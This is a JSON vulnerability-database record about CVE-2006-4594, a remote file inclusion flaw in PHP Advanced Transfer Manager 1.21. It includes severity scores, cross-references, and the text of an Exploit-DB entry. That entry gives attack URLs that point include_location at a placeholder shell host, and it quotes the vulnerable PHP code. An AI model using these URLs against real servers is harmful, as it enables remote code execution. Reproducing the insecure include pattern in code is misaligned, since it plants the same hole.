{"href": "https://vulners.com/osvdb/OSVDB:31976", "id": "OSVDB:31976", "reporter": "OSVDB", "published": "2006-08-30T18:41:52", "description": "# No description provided by the source\n\n## References:\nVendor URL: http://phpatm.free.fr/\n[Related OSVDB ID: 31975](https://vulners.com/osvdb/OSVDB:31975)\n[Related OSVDB ID: 31994](https://vulners.com/osvdb/OSVDB:31994)\nISS X-Force ID: 28670\nGeneric Exploit URL: http://www.milw0rm.com/exploits/2279\n[CVE-2006-4594](https://vulners.com/cve/CVE-2006-4594)\nBugtraq ID: 19765\n", "title": "PHP Advanced Transfer Manager (phpATM) login.php include_location Variable Remote File Inclusion", "lastseen": "2017-04-28T13:20:28", "bulletinFamily": "software", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "references": [], "edition": 1, "cvelist": ["CVE-2006-4594"], "affectedSoftware": [], "viewCount": 5, "enchantments": {"score": {"value": 7.1, "vector": "NONE", "modified": "2017-04-28T13:20:28", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-4594"]}, {"type": "osvdb", "idList": ["OSVDB:31975"]}, {"type": "exploitdb", "idList": ["EDB-ID:2279"]}], "modified": "2017-04-28T13:20:28", "rev": 2}, "vulnersScore": 7.1}, "modified": "2006-08-30T18:41:52"}

{"cve": [{"lastseen": "2021-02-02T05:27:23", "description": "Multiple PHP remote file inclusion vulnerabilities in PHP Advanced Transfer Manager (phpAtm) 1.21 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the include_location parameter in (1) confirm.php or (2) login.php. NOTE: the include_location parameter to index.php is already covered by CVE-2005-1681.", "edition": 6, "cvss3": {}, "published": "2006-09-06T22:04:00", "title": "CVE-2006-4594", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-4594"], "modified": "2017-10-19T01:29:00", "cpe": ["cpe:/a:bugada_andrea:php_advanced_transfer_manager:1.20", "cpe:/a:bugada_andrea:php_advanced_transfer_manager:1.21"], "id": "CVE-2006-4594", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-4594", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:bugada_andrea:php_advanced_transfer_manager:1.20:*:*:*:*:*:*:*", "cpe:2.3:a:bugada_andrea:php_advanced_transfer_manager:1.21:*:*:*:*:*:*:*"]}], "osvdb": [{"lastseen": "2017-04-28T13:20:28", "bulletinFamily": "software", "cvelist": ["CVE-2006-4594"], "description": "# No description provided by the source\n\n## References:\nVendor URL: http://phpatm.free.fr/\n[Related OSVDB ID: 31976](https://vulners.com/osvdb/OSVDB:31976)\n[Related OSVDB ID: 31994](https://vulners.com/osvdb/OSVDB:31994)\nISS X-Force ID: 28670\nGeneric Exploit URL: http://www.milw0rm.com/exploits/2279\n[CVE-2006-4594](https://vulners.com/cve/CVE-2006-4594)\nBugtraq ID: 19765\n", "edition": 1, "modified": "2006-08-30T18:41:52", "published": "2006-08-30T18:41:52", "href": "https://vulners.com/osvdb/OSVDB:31975", "id": "OSVDB:31975", "title": "PHP Advanced Transfer Manager (phpATM) confirm.php include_location Variable Remote File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-01-31T15:54:53", "description": "phpAtm <= 1.21 (include_location) Remote File Include Vulnerabilities. CVE-2006-4594,CVE-2006-4749. Webapps exploit for php platform", "published": "2006-08-30T00:00:00", "type": "exploitdb", "title": "phpAtm <= 1.21 include_location Remote File Include Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-4594", "CVE-2006-4749"], "modified": "2006-08-30T00:00:00", "id": "EDB-ID:2279", "href": "https://www.exploit-db.com/exploits/2279/", "sourceData": "########################################################################\n# phpAtm <= v1.21 (include_location) Remote File Inclusion Exploit\n# \n# Level : Dangerous \n# Download : http://phpatm.free.fr/\n# Version : v1.21 \n# \n# Found By: KinSize [MHG Security Team]\n#\n########################################################################\n# Code : include($include_location.'include/conf.php');\n#\n# exploit:\n# http://www.sitename.com/[script_path]/confirm.php?include_location=http://shellurl.com ? \n# http://www.sitename.com/[script_path]/index.php?include_location=http://shellurl.com ? \n# http://www.sitename.com/[script_path]/login.php?include_location=http://shellurl.com ?\n########################################################################\n#\n#Conatact : nefretaskimdir[at]gmail.com\n#\n# GreetZ : Damage-N | by_emr3 | by_OkSit | ESKOBAR | Ye.iL | PowerCobra | sys-worm(Turkish)| Z e b e r u S | ALL Turkish & MusLim\n########################################################################\n\nAdded information:\n\nAt first glance this doesn't look vulnerable but then again:\n\nline 85-94 of common.php\nwhile (list(, $arr) = each($sysarr))\n{\n if (is_array($arr))\n {\n while (list($key, $value) = each($arr))\n {\n $GLOBALS[$key] = $value;\n }\n }\n}\n\n/str0ke\n\n# milw0rm.com [2006-08-30]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/2279/"}]}